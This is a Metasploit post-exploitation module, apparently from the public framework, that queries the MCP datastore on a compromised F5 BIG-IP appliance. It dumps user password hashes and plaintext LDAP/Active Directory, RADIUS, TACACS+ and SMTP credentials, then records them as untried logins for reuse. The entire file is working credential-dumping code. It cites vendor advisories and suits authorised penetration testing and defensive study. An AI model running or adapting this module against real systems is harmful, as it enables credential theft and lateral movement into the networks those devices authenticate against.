1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9
  include Msf::Post::Linux::F5Mcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'F5 Big-IP Gather Information from MCP Datastore',
16
        'Description' => %q{
17
          This module gathers various interesting pieces of data from F5's
18
          "mcp" datastore, which is accessed via /var/run/mcp using a
19
          proprietary protocol.
20

21
          Adapted from:  https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => ['Ron Bowes'],
25
        'Platform' => ['linux', 'unix'],
26
        'SessionTypes' => ['shell', 'meterpreter'],
27
        'References' => [
28
          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC
29
          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
30
          ['URL', 'https://support.f5.com/csp/article/K97843387'],
31
          ['ATT&CK', Mitre::Attack::Technique::T1003_OS_CREDENTIAL_DUMPING],
32
        ],
33
        'DisclosureDate' => '2022-11-16',
34
        'Notes' => {
35
          'Stability' => [CRASH_SAFE],
36
          'Reliability' => [],
37
          'SideEffects' => []
38
        }
39
      )
40
    )
41

42
    register_options(
43
      [
44
        OptBool.new('GATHER_HASHES', [true, 'Gather password hashes from MCP', true]),
45
        OptBool.new('GATHER_SERVICE_PASSWORDS', [true, 'Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from MCP', true]),
46
        OptBool.new('GATHER_DB_VARIABLES', [true, 'Gather database variables (warning: slow)', false]),
47
      ]
48
    )
49
  end
50

51
  def gather_hashes
52
    print_status('Gathering users and password hashes from MCP')
53
    users = mcp_simple_query('userdb_entry')
54

55
    unless users
56
      print_error('Failed to query users')
57
      return
58
    end
59

60
    users.each do |u|
61
      print_good("#{u['userdb_entry_name']}:#{u['userdb_entry_passwd']}")
62

63
      create_credential(
64
        jtr_format: Metasploit::Framework::Hashes.identify_hash(u['userdb_entry_passwd']),
65
        origin_type: :session,
66
        post_reference_name: refname,
67
        private_type: :nonreplayable_hash,
68
        private_data: u['userdb_entry_passwd'],
69
        session_id: session_db_id,
70
        username: u['userdb_entry_name'],
71
        workspace_id: myworkspace_id
72
      )
73
    end
74
  end
75

76
  def gather_upstream_passwords
77
    print_status('Gathering upstream passwords from MCP')
78

79
    vprint_status('Trying to fetch LDAP / Active Directory configuration')
80
    ldap_config = mcp_simple_query('auth_ldap_config') || []
81
    ldap_config.select! { |config| config['auth_ldap_config_bind_pw'] }
82
    if ldap_config.empty?
83
      print_status('No LDAP / Active Directory password found')
84
    else
85
      ldap_config.each do |config|
86
        config['auth_ldap_config_servers'].each do |server|
87
          report_cred(
88
            username: config['auth_ldap_config_bind_dn'],
89
            password: config['auth_ldap_config_bind_pw'],
90
            host: server,
91
            port: config['auth_ldap_config_port'],
92
            service_name: (config['auth_ldap_config_ssl'] == 1 ? 'ldaps' : 'ldap')
93
          )
94
        end
95
      end
96
    end
97

98
    vprint_status('Trying to fetch Radius configuration')
99
    radius_config = mcp_simple_query('radius_server') || []
100
    radius_config.select! { |config| config['radius_server_secret'] }
101
    if radius_config.empty?
102
      print_status('No Radius password found')
103
    else
104
      radius_config.each do |config|
105
        report_cred(
106
          password: config['radius_server_secret'],
107
          host: config['radius_server_server'],
108
          port: config['radius_server_port'],
109
          service_name: 'radius'
110
        )
111
      end
112
    end
113

114
    vprint_status('Trying to fetch TACACS+ configuration')
115
    tacacs_config = mcp_simple_query('auth_tacacs_config') || []
116
    tacacs_config.select! { |config| config['auth_tacacs_config_secret'] }
117
    if tacacs_config.empty?
118
      print_status('No TACACS+ password found')
119
    else
120
      tacacs_config.each do |config|
121
        config['auth_tacacs_config_servers'].each do |server|
122
          report_cred(
123
            password: config['auth_tacacs_config_secret'],
124
            host: server,
125
            port: 49,
126
            service_name: 'tacacs+'
127
          )
128
        end
129
      end
130
    end
131

132
    vprint_status('Trying to fetch SMTP configuration')
133
    smtp_config = mcp_simple_query('smtp_config') || []
134
    smtp_config.select! { |config| config['smtp_config_username'] }
135
    if smtp_config.empty?
136
      print_status('No SMTP password found')
137
    else
138
      smtp_config.each do |config|
139
        report_cred(
140
          username: config['smtp_config_username'],
141
          password: config['smtp_config_password'],
142
          host: config['smtp_config_smtp_server_address'],
143
          port: config['smtp_config_smtp_server_port'],
144
          service_name: 'smtp'
145
        )
146
      end
147
    end
148
  end
149

150
  def gather_db_variables
151
    print_status('Fetching db variables from MCP (this takes a bit)...')
152
    vars = mcp_simple_query('db_variable')
153

154
    unless vars
155
      print_error('Failed to query db variables')
156
      return
157
    end
158

159
    vars.each do |v|
160
      print_good "#{v['db_variable_name']} => #{v['db_variable_value']}"
161
    end
162
  end
163

164
  def resolve_host(hostname)
165
    ip = nil
166
    if session.type == 'meterpreter' && session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_NET_RESOLVE_HOST)
167
      result = session.net.resolve.resolve_host(hostname)
168
      ip = result[:ip] if result
169
    else
170
      result = cmd_exec("dig +short '#{hostname}'")
171
      ip = result.strip unless result.blank?
172
    end
173

174
    vprint_warning("Failed to resolve hostname: #{hostname}") unless ip
175

176
    ip
177
  rescue Rex::Post::Meterpreter::RequestError => e
178
    elog("Failed to resolve hostname: #{hostname.inspect}", error: e)
179
  end
180

181
  def report_cred(opts)
182
    netloc = "#{opts[:host]}:#{opts[:port]}"
183
    print_good("#{netloc.ljust(21)} - #{opts[:service_name]}: '#{opts[:username]}:#{opts[:password]}'")
184

185
    if opts[:host] && !Rex::Socket.is_ip_addr?(opts[:host])
186
      opts[:host] = resolve_host(opts[:host])
187
    end
188

189
    service_data = {
190
      address: opts[:host],
191
      port: opts[:port],
192
      service_name: opts[:service_name],
193
      protocol: opts.fetch(:protocol, 'tcp'),
194
      workspace_id: myworkspace_id
195
    }
196

197
    credential_data = {
198
      post_reference_name: refname,
199
      session_id: session_db_id,
200
      origin_type: :session,
201
      private_data: opts[:password],
202
      private_type: :password,
203
      username: opts[:username]
204
    }.merge(service_data)
205

206
    login_data = {
207
      core: create_credential(credential_data),
208
      status: Metasploit::Model::Login::Status::UNTRIED
209
    }.merge(service_data)
210

211
    create_credential_login(login_data)
212
  end
213

214
  def run
215
    gather_hashes if datastore['GATHER_HASHES']
216
    gather_upstream_passwords if datastore['GATHER_SERVICE_PASSWORDS']
217
    gather_db_variables if datastore['GATHER_DB_VARIABLES']
218
  end
219
end
220

221